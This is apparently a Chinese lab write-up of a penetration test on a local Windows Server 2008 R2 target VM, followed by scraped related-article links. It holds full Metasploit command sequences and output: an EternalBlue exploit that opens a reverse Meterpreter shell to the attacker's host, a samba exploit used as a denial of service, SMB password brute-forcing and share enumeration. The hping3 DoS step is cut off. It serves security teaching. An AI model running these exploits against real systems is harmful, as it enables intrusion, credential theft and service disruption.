渗透测试实例,xampp靶机实验
实验名称:渗透测试实例,xampp靶机实验
实验目的:对xampp靶机进行渗透测试
实验环境:Kali虚拟机一台4G xampp靶机一台 IP:192.168.22.128
实验步骤:
一、对靶机进行扫描:使用Neuss
二、开启metasploit框架进行扫描
msf6 > db_nmap -A -T4 192.168.22.128 使用namp进行扫描
(1)进行渗透测试
扫描smb版本信息
msf6 > search smb_version 查看是否有smb版本扫描模块
Matching Modules
Name Disclosure Date Rank Check Description
0 auxiliary/scanner/smb/smb_version normal No SMB Version Detection
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_version
msf6 > use auxiliary/scanner/smb/smb_version 引用模块
msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.22.128 设置扫描IP地址
rhosts => 192.168.22.128
msf6 auxiliary(scanner/smb/smb_version) > run 执行
[] 192.168.22.128:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:2w 3d 1h 19m 15s) (guid:{079eddaa-883e-448c-9c75-df3fb0d2aa5c}) (authentication domain:W2K8)
[+] 192.168.22.128:445 - Host is running Windows 2008 R2 Datacenter SP1 (build:7601) (name:W2K8) (workgroup:WORKGROUP)
[] 192.168.22.128: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
(2)先寻找暴露出来的第一个问题点
msf6 auxiliary(scanner/smb/smb_version) > search smb description:2 寻找相应模块
Matching Modules
Name Disclosure Date Rank Check Description
0 auxiliary/admin/mssql/mssql_ntlm_stealer normal No Microsoft SQL Server NTLM Stealer
1 auxiliary/docx/word_unc_injector normal No Microsoft Word UNC Path Injector
2 auxiliary/dos/samba/read_nttrans_ea_list normal No Samba read_nttrans_ea_list Integer Overflow
3 auxiliary/dos/windows/smb/ms05_047_pnp normal No Microsoft Plug and Play Service Registry Overflow
4 auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh normal No Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
5 auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff normal No Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
6 auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop normal No Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop
7 auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow normal No Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS
8 auxiliary/dos/windows/smb/ms11_019_electbowser normal No Microsoft Windows Browser Pool DoS
9 auxiliary/fuzzers/smb/smb2_negotiate_corrupt normal No SMB Negotiate SMB2 Dialect Corruption
10 auxiliary/gather/konica_minolta_pwd_extract normal No Konica Minolta Password Extractor
11 auxiliary/scanner/http/citrix_dir_traversal 2019-12-17 normal No Citrix ADC (NetScaler) Directory Traversal Scanner
12 auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir normal No SAP SOAP RFC RZL_READ_DIR_LOCAL Directory Contents Listing
13 auxiliary/scanner/smb/smb_enum_gpp normal No SMB Group Policy Preference Saved Passwords Enumeration
14 auxiliary/server/capture/smb normal No Authentication Capture: SMB
15 auxiliary/server/teamviewer_uri_smb_redirect normal No TeamViewer Unquoted URI Handler SMB Redirect
16 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)
17 exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution
18 exploit/multi/ids/snort_dce_rpc 2007-02-19 good No Snort 2 DCE/RPC Preprocessor Buffer Overflow
19 exploit/windows/browser/java_ws_double_quote 2012-10-16 excellent No Sun Java Web Start Double Quote Injection
20 exploit/windows/fileformat/ms13_071_theme 2013-09-10 excellent No MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution
21 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution
22 exploit/windows/fileformat/ursoft_w32dasm 2005-01-24 good No URSoft W32Dasm Disassembler Function Buffer Overflow
23 exploit/windows/fileformat/vlc_smb_uri 2009-06-24 great No VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow
24 exploit/windows/misc/hp_dataprotector_cmd_exec 2014-11-02 excellent Yes HP Data Protector 8.10 Remote Command Execution
25 exploit/windows/misc/hp_dataprotector_install_service 2011-11-02 excellent Yes HP Data Protector 6.10/6.11/6.20 Install Service
26 exploit/windows/smb/ms03_049_netapi 2003-11-11 good No MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow
27 exploit/windows/smb/ms04_007_killbill 2004-02-10 low No MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow
28 exploit/windows/smb/ms04_031_netdde 2004-10-12 good No MS04-031 Microsoft NetDDE Service Overflow
29 exploit/windows/smb/ms05_039_pnp 2005-08-09 good Yes MS05-039 Microsoft Plug and Play Service Overflow
30 exploit/windows/smb/ms06_025_rasmans_reg 2006-06-13 good No MS06-025 Microsoft RRAS Service RASMAN Registry Overflow
31 exploit/windows/smb/ms06_025_rras 2006-06-13 average No MS06-025 Microsoft RRAS Service Overflow
32 exploit/windows/smb/ms06_040_netapi 2006-08-08 good No MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
33 exploit/windows/smb/ms06_066_nwapi 2006-11-14 good No MS06-066 Microsoft Services nwapi32.dll Module Exploit
34 exploit/windows/smb/ms06_066_nwwks 2006-11-14 good No MS06-066 Microsoft Services nwwks.dll Module Exploit
35 exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual No MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
36 exploit/windows/smb/ms07_029_msdns_zonename 2007-04-12 manual No MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
37 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
38 exploit/windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good No MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
39 exploit/windows/smb/ms10_061_spoolss 2010-09-14 excellent No MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability
40 exploit/windows/smb/ms15_020_shortcut_icon_dllloader 2015-03-10 excellent No Microsoft Windows Shell LNK Code Execution
41 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
42 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
43 exploit/windows/smb/smb_relay 2001-03-31 excellent No MS08-068 Microsoft Windows SMB Relay Code Execution
44 payload/windows/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
45 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
46 post/windows/gather/credentials/gpp normal No Windows Gather Group Policy Preference Saved Passwords
47 post/windows/gather/word_unc_injector normal No Windows Gather Microsoft Office Word UNC Path Injector
Interact with a module by name or index. For example info 47, use 47 or use post/windows/gather/word_unc_injector
1、使用内存损坏攻击
msf6 > use exploit windows/misc/hp_dataprotector_install_service 先进入此模块
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
Matching Modules
Name Disclosure Date Rank Check Description
0 exploit/windows/misc/hp_dataprotector_install_service 2011-11-02 excellent Yes HP Data Protector 6.10/6.11/6.20 Install Service
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/misc/hp_dataprotector_install_service
[] Using exploit/windows/misc/hp_dataprotector_install_service
msf6exploit(windows/misc/hp_dataprotector_install_service) > use exploit/linux/samba/chain_reply 引用模块
[] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/samba/chain_reply) > set rhosts 192.168.22.128 设置攻击目标IP地址
rhosts => 192.168.22.128
msf6 exploit(linux/samba/chain_reply) > run 执行
[] Started reverse TCP handler on 192.168.22.100:4444
[] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[*] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
![](/assets/blank.gif)
![](/assets/blank.gif)
查看靶机的任务管理器看资源使用情况
![](/assets/blank.gif)
Cpu资源占用比例很高,并且卡顿严重,在kali中ctrl+c结束攻击则恢复正常,攻击成功
![](/assets/blank.gif)
2、使用永恒之蓝漏洞
msf6 exploit(windows/misc/hp_dataprotector_install_service) > search Windows 2008 R2 根据未安装插件补丁,条件2前面SMB扫描出相关信息)
Matching Modules
Name Disclosure Date Rank Check Description
0 auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh normal No Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
1 auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop normal No Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop
2 auxiliary/scanner/dcerpc/windows_deployment_services normal No Microsoft Windows Deployment Services Unattend Retrieval
3 auxiliary/scanner/smb/smb_enum_gpp normal No SMB Group Policy Preference Saved Passwords Enumeration
4 exploit/multi/http/cisco_dcnm_upload 2013-09-18 excellent Yes Cisco Prime Data Center Network Manager Arbitrary File Upload
5 exploit/multi/http/rocket_servergraph_file_requestor_rce 2013-10-30 great Yes Rocket Servergraph Admin Center fileRequestor Remote Code Execution
6 exploit/multi/misc/hp_data_protector_exec_integutil 2014-10-02 great Yes HP Data Protector EXEC_INTEGUTIL Remote Code Execution
7 exploit/windows/emc/alphastor_device_manager_exec 2013-01-18 excellent Yes EMC AlphaStor Device Manager Opcode 0x75 Command Injection
8 exploit/windows/http/ektron_xslt_exec_ws 2015-02-05 excellent Yes Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution
9 exploit/windows/http/oracle_endeca_exec 2013-07-16 excellent Yes Oracle Endeca Server Remote Command Execution
10 exploit/windows/http/sap_configservlet_exec_noauth 2012-11-01 great Yes SAP ConfigServlet Remote Code Execution
11 exploit/windows/local/cve_2018_8453_win32k_priv_esc 2018-10-09 manual No Windows NtUserSetWindowFNID Win32k User Callback
12 exploit/windows/local/ms13_005_hwnd_broadcast 2012-11-27 excellent No MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation
13 exploit/windows/local/ms14_058_track_popup_menu 2014-10-14 normal Yes Windows TrackPopupMenu Win32k NULL Pointer Dereference
14 exploit/windows/local/ms15_051_client_copy_image 2015-05-12 normal Yes Windows ClientCopyImage Win32k Exploit
15 exploit/windows/local/ms18_8120_win32k_privesc 2018-05-09 good No Windows SetImeInfoEx Win32k NULL Pointer Dereference
16 exploit/windows/misc/hp_dataprotector_encrypted_comms 2016-04-18 normal Yes HP Data Protector Encrypted Communication Remote Command Execution
17 exploit/windows/misc/hp_dataprotector_exec_bar 2014-01-02 excellent Yes HP Data Protector Backup Client Service Remote Code Execution
18 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
19 exploit/windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good No MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
20 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
21 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
22 post/windows/gather/credentials/gpp normal No Windows Gather Group Policy Preference Saved Passwords
23 post/windows/gather/credentials/windows_autologin normal No Windows Gather AutoLogin User Credential Extractor
Interact with a module by name or index. For example info 23, use 23 or use post/windows/gather/credentials/windows_autologin
msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit windows/smb/ms17_010_eternalblue 先进入此模块
Matching Modules
Name Disclosure Date Rank Check Description
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/smb/ms17_010_eternalblue_win8
==msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_eternalblue 引用天空之蓝模块
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
==msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.22.128 设置攻击目标IP地址
rhosts => 192.168.22.128
msf6 exploit(windows/smb/ms17_010_eternalblue) > run 执行
[] Started reverse TCP handler on 192.168.22.100:4444
[] 192.168.22.128:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.22.128:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
[] 192.168.22.128:445 - Scanned 1 of 1 hosts (100% complete)
[] 192.168.22.128:445 - Connecting to target for exploitation.
[+] 192.168.22.128:445 - Connection established for exploitation.
[+] 192.168.22.128:445 - Target OS selected valid for OS indicated by SMB reply
[] 192.168.22.128:445 - CORE raw buffer dump (53 bytes)
[] 192.168.22.128:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[] 192.168.22.128:445 - 0x00000010 30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65 008 R2 Datacente
[] 192.168.22.128:445 - 0x00000020 72 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 r 7601 Service P
[] 192.168.22.128:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 192.168.22.128:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[] 192.168.22.128:445 - Trying exploit with 12 Groom Allocations.
[] 192.168.22.128:445 - Sending all but last fragment of exploit packet
[] 192.168.22.128:445 - Starting non-paged pool grooming
[+] 192.168.22.128:445 - Sending SMBv2 buffers
[+] 192.168.22.128:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[] 192.168.22.128:445 - Sending final SMBv2 buffers.
[] 192.168.22.128:445 - Sending last fragment of exploit packet!
[] 192.168.22.128:445 - Receiving response from exploit packet
[+] 192.168.22.128:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[] 192.168.22.128:445 - Sending egg to corrupted connection.
[] 192.168.22.128:445 - Triggering free of corrupted buffer.
[] Sending stage (200262 bytes) to 192.168.22.128
[*] Meterpreter session 1 opened (192.168.22.100:4444 -> 192.168.22.128:51346) at 2021-02-07 00:06:13 +0800
[+] 192.168.22.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.22.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.22.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
验证
meterpreter > pwd
C:\Windows\system32
meterpreter > cd D:
meterpreter > pwd
D:
meterpreter >
3、SMB用户登录枚举
将攻击包复制到虚拟机并添加xmapp的root密码
msf6 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/smb/smb_login 引用模块
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.22.128 设置攻击目标IP地址
rhosts => 192.168.22.128
msf6 auxiliary(scanner/smb/smb_login) > set pass_file /root/wen.txt 指定字典库文件
pass_file => /root/wen.txt
msf6 auxiliary(scanner/smb/smb_login) > set smbuser administrator 设置用户名
smbuser => administrator
msf6 auxiliary(scanner/smb/smb_login) > run 执行,获取到用户密码
[] 192.168.22.128:445 - 192.168.22.128:445 - Starting SMB login bruteforce
[-] 192.168.22.128:445 - 192.168.22.128:445 - Failed: ‘.\administrator:root’,
[-] 192.168.22.128:445 - 192.168.22.128:445 - Failed: ‘.\administrator:admin’,
[-] 192.168.22.128:445 - 192.168.22.128:445 - Failed: ‘.\administrator:test’,
[-] 192.168.22.128:445 - 192.168.22.128:445 - Failed: ‘.\administrator:system’,
[-] 192.168.22.128:445 - 192.168.22.128:445 - Failed: ‘.\administrator:guest’,
[+] 192.168.22.128:445 - 192.168.22.128:445 - Success: ‘.\administrator:p@9865321’ Administrator
[] 192.168.22.128:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
4、SMB枚举有哪些用户存在
msf6 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/smb/smb_enumshares 引用模块
msf6 auxiliary(scanner/smb/smb_enumshares) > set rhosts 192.168.22.128 设置攻击目标IP地址
rhosts => 192.168.22.128
msf6 auxiliary(scanner/smb/smb_enumshares) > set smbuser administrator 设置用户名
smbuser => administrator
msf6 auxiliary(scanner/smb/smb_enumshares) > set smbpass p@9865321 设置之前获取到的密码
smbpass => p@9865321
msf6 auxiliary(scanner/smb/smb_enumshares) > set showfiles true 进行设置
showfiles => true
msf6 auxiliary(scanner/smb/smb_enumshares) > set spidershares true 进行设置
spidershares => true
msf6 auxiliary(scanner/smb/smb_enumshares) > run 执行
5、SMB枚举有哪些用户存在
msf6 auxiliary(scanner/smb/smb_enumshares) > use auxiliary/scanner/smb/smb_enumshares 引用模块
msf6 auxiliary(scanner/smb/smb_enumshares) > set rhosts 192.168.22.128 设置攻击目标IP地址
rhosts => 192.168.22.128
msf6 auxiliary(scanner/smb/smb_enumshares) > set smbuser administrator 设置主机名
smbuser => administrator
msf6 auxiliary(scanner/smb/smb_enumshares) > set smbpass p@9865321 设置之前获取到的密码
smbpass => p@9865321
msf6 auxiliary(scanner/smb/smb_enumshares) > run 执行
6、http扫描检查robots.txt文件
msf6 auxiliary(scanner/smb/smb_enumshares) > use auxiliary scanner/http/cert 引用模块
Matching Modules
Name Disclosure Date Rank Check Description
0 auxiliary/scanner/http/cert normal No HTTP SSL Certificate Checker
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/cert
[*] Using auxiliary/scanner/http/cert
msf6 auxiliary(scanner/http/cert) > use auxiliary/scanner/http/robots_txt 引用模块
msf6 auxiliary(scanner/http/robots_txt) > set rhosts 192.168.22.128 设置攻击目标的IP地址
rhosts => 192.168.22.128
msf6 auxiliary(scanner/http/robots_txt) > set rport 84 设置攻击目标的端口号
rport => 84
msf6 auxiliary(scanner/http/robots_txt) > run 执行
[-] [192.168.22.128] /robots.txt - No response
[] Scanned 1 of 1 hosts (100% complete)
[] Auxiliary module execution completed
7、使用hping3造成拒绝服务攻击
──(root
渗透测试实例,xampp靶机实验相关推荐
- 渗透测试学习之靶机DC-2
1.下载靶机 本篇文章是DC靶机系列的第二个篇,针对DC-2,建议感兴趣的读者从DC-1开始练习((26条消息) 渗透测试学习之靶机DC-1_xdbzdgx的博客-CSDN博客). DC-2的下载地址 ...
- 渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具
操作系统:https://zhuanlan.zhihu.com/p/162865015 1.基于 Windows.Linux.Android 的渗透测试系统 1.1 基于 Linux 的系统 Kali ...
- Web完整渗透测试实例(windows)
学习一整套的web渗透测试实验对以后的测试工作很有帮助,所以我把学习环境中的实现写下来,提供对整个网站测试的经验. 目的: (1)了解黑客是如何通过漏洞入侵网站,并获得服务器权限: (2)学习渗透测试 ...
- Web完整渗透测试实例
学习一整套的web渗透测试实验对以后的测试工作很有帮助,所以我把学习环境中的实现写下来,提供对整个网站测试的经验. 目的: (1)了解黑客是如何通过漏洞入侵网站,并获得服务器权限: (2)学习渗透测试 ...
- 渗透测试学习之靶机DC-6
1.下载靶机 本篇文章是DC靶机系列的第6篇,针对的是靶机DC-6,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章. DC-6的下载地址为DC: 6 ~ VulnHub.下载后解压为. ...
- 【渗透测试】SolidState靶机渗透练习_rbash逃逸+4555端口james服务漏洞
一.信息收集: arp-scan -l nmap -sS -sV -T5 -p- 192.168.225.190 dirb http://192.168.225.190 //无有效目录 2.根据端口扫 ...
- 渗透测试实例指南---CSRF
CSRF(cross-site request forgery)跨站请求伪造,对网站的恶意利用,与XSS有很大差别,XSS利用站点内的信任用户,而CSRF是伪装成受信任用户请求受信任的网站. 例如:用 ...
- 渗透测试实战指南笔记
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache.Nginx.MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包. 首先,下载需要的安装包 ...
- Web安全防攻(渗透测试)
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache.Nginx.MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包. 首先,下载需要的安装包 ...
最新文章
- nginx 子请求接收响应_Nginx详解其原理
- Python kmean-opencv
- 2017-2018-1 2015335 《信息安全系统设计基础》 第4周课上实践 (新补的,但不完整)...
- 正则基础学习1 这俩天补上正则全部内容,让你简单的学会正则,欢迎收藏当文档
- cxf返回的报文,命名空间无前缀
- 北京林业大学计算机技术复试,北京林业大学计算机应用技术04年考研复试办法...
- 3-11 Matplotlib数据可视化基础
- Linux如何进行GPIO读写操作的?
- mysql的预准备语句_mysql – 将字符串插入到没有”的预准备语句中
- 面试官问你是true还是false你可以最后反问他这个
- 《统计学习方法》—— 聚类方法(层次聚类和K均值聚类)
- ORACLE11g R2下载地址
- html语言中的字体代码,html中让字体变红的代码
- CISP可以自己报名考试吗?
- Ubuntu16.04/linux系统旋转显示器屏幕即竖屏显示(亲测)
- 【线性代数(2)】n阶行列式三种定义
- OOP的六大原则+一法则
- CentOS 6.X yum源更新(阿里云默认最新更新为CentOS6.10)
- Jenkins 如何使用 CrumbIssuer 防御 CSRF 攻击
- 云计算 基础服务 iscsi 实现